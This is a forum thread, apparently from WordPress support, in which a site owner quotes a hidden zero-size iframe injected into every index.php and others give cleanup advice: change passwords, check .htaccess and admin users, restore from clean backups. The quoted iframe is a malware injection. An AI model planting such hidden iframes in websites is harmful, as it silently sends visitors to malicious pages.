Removing malicious code on my WordPress site

[Historical Forums User]

Google has blocked my site and says it found this malicious code.

<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0">

They say it is here…
http://mywebsite.com/blog/page/10/

How exactly do I find that? I dont know of a page 10.

[TheDoc]

Change all passwords and do a search through your theme for any malicious code, usually some form of base64. If a bunch of pages are infected, sometimes it’s best to simply roll the site back to a previous version (shouldn’t effect the database).

[Historical Forums User]

I already know what the malicious code is. I noted it above. My question is where is this location? http://mywebsite.com/blog/page/10/

I dont see a “blog” folder or a “page” folder in my wordpress install.

[TheDoc]

Check your .htaccess, check to see if there are any additional users in your WP backend, check the pages in your backend, etc.

There may be more malicious code than just that.

[Historical Forums User]

Ok this plugin found it for me.
http://wordpress.org/extend/plugins/exploit-scanner/

The malicious code was placed in every index.php file on my site.

[__]

The malicious code was placed in every index.php file on my site.

Placed in, but that’s not where it came from. I hope you take note of what @TheDoc said: you need to change passwords (site, database, web host), check for unknown users or users who are admins but shouldn’t be, check your entire web hosting space for files that shouldn’t be there.

In general, trying to “fix” things after an attack is the wrong approach. Your very best option is to delete everything (even if you think it’s “okay”) and then re-install + restore from a backup that you know is good.

If you haven’t made preparations for this sort of thing, you can be ready next time: keep a clean backup of all your code, backup your database and resources (css, js files, images, etc.) regularly. Keep your backups on a different computer than your live site.

[Author]

Posts